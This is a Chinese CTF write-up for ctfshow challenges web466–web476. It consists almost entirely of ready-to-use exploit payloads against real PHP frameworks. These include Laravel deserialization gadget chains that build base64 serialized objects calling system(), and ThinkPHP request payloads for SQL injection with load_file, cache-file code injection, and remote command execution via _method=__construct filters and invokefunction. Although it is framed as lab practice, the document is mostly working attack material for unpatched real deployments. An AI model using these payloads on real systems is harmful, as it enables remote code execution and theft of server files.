CTFSHOW框架复现篇

Posted 2022-11-29 yu22x

文章目录

• • web466
  • web467
  • web468
  • web469|web470
  • web471
  • web472
  • web473
  • web474
  • web475
  • web476

web466

反序列化格式 /admin/序列化串base64

参考文章
https://xz.aliyun.com/t/11002
payload

<?php
namespace Illuminate\\Validation 
    class Validator 
       public $extensions = [];
       public function __construct() 
            $this->extensions = ['' => 'system'];
       
    


namespace Illuminate\\Broadcasting 
    use  Illuminate\\Validation\\Validator;
    class PendingBroadcast 
        protected $events;
        protected $event;
        public function __construct($cmd)
        
            $this->events = new Validator();
            $this->event = $cmd;
        
    
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));

?>

web467

参考文章https://xz.aliyun.com/t/9478

<?php
namespace Illuminate\\Broadcasting

    use  Illuminate\\Events\\Dispatcher;
    class PendingBroadcast
    
        protected $events;
        protected $event;
        public function __construct($cmd)
        
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        
    
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));



namespace Illuminate\\Events

    class Dispatcher
    
       protected $listeners;
       public function __construct($event)
           $this->listeners=[$event=>['system']];
       
    

web468

参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

<?php
namespace Illuminate\\Broadcasting

	use Illuminate\\Notifications\\ChannelManager;
	class PendingBroadcast
	
		protected $events;
		public function __construct($cmd)
		
			$this->events = new ChannelManager($cmd);
		
	
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));


namespace Illuminate\\Notifications

	class ChannelManager
	
		protected $app;
		protected $defaultChannel;
		protected $customCreators;
		public function __construct($cmd)
		
			$this->defaultChannel = 'yu22x';
			$this->customCreators = array('yu22x' => 'system'); 
			$this->app = $cmd;
		
	

?>

发送payload后看下源代码即可。

web469|web470

参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

<?php
namespace Illuminate\\Broadcasting

	use Faker\\ValidGenerator;
	class PendingBroadcast
	
		protected $events;
		public function __construct($cmd)
		
			$this->events = new ValidGenerator($cmd);
		
	
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));


namespace Faker

	use Faker\\DefaultGenerator;
	class ValidGenerator
	
		protected $maxRetries;
		protected $validator;
		protected $generator;
		public function __construct($cmd)
		
			$this->generator = new DefaultGenerator($cmd);
			$this->maxRetries = 10000000;
			$this->validator = 'system';
		
		
	


namespace Faker

	class DefaultGenerator
	
		protected $default;
		public function __construct($cmd)
		
			$this->default = $cmd;
		
	

?>

web471

参考文章http://www.136.la/jingpin/show-180114.html#POC1_46

<?php
namespace Illuminate\\Broadcasting

    use Illuminate\\Bus\\Dispatcher;
    use Illuminate\\Foundation\\Console\\QueuedCommand;
    class PendingBroadcast
    
        protected $events;
        protected $event;

        public function __construct()
        
            $this->events = new Dispatcher();
            $this->event = new QueuedCommand();
        

    


namespace Illuminate\\Foundation\\Console

    class QueuedCommand
    
        public $connection = 'cat /flag';
    


namespace Illuminate\\Bus


    class Dispatcher
    
        protected $queueResolver;

        public function __construct()
        
            $this->queueResolver='system';
        

    


namespace


    use Illuminate\\Broadcasting\\PendingBroadcast;

    echo base64_encode(serialize(new PendingBroadcast()));

web472

参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload

<?php
namespace Illuminate\\Broadcasting
 
use Illuminate\\Contracts\\Events\\Dispatcher;
 
class PendingBroadcast

 protected $event;
 protected $events;
    public function __construct($events, $event)
    
        $this->event = $event;
        $this->events = $events;
    


namespace Illuminate\\Bus
class Dispatcher

 protected $queueResolver;
    public function __construct($queueResolver)
    
        $this->queueResolver = $queueResolver;
    
 


namespace Illuminate\\Broadcasting
class BroadcastEvent

 public $connection;
 public function __construct($connection)
    
        $this->connection = $connection;
    
  

namespace
 $c = new Illuminate\\Broadcasting\\BroadcastEvent('cat /flag');
 $a = new Illuminate\\Bus\\Dispatcher('system');
 $b = new Illuminate\\Broadcasting\\PendingBroadcast($a,$c);
 echo base64_encode(serialize($b));

web473

参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数 ，其中exp可用。
payload
index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1

web474

参考文章https://blog.csdn.net/rfrder/article/details/114599310

public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php

web475

s=cat /flag&_method=__construct&method=POST&filter[]=system

aaaa=cat /flag&_method=__construct&method=GET&filter[]=system

_method=__construct&method=GET&filter[]=system&get[]=cat /flag

c=cat /flag&f=calc&_method=filter

web476

?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*

?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*

?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*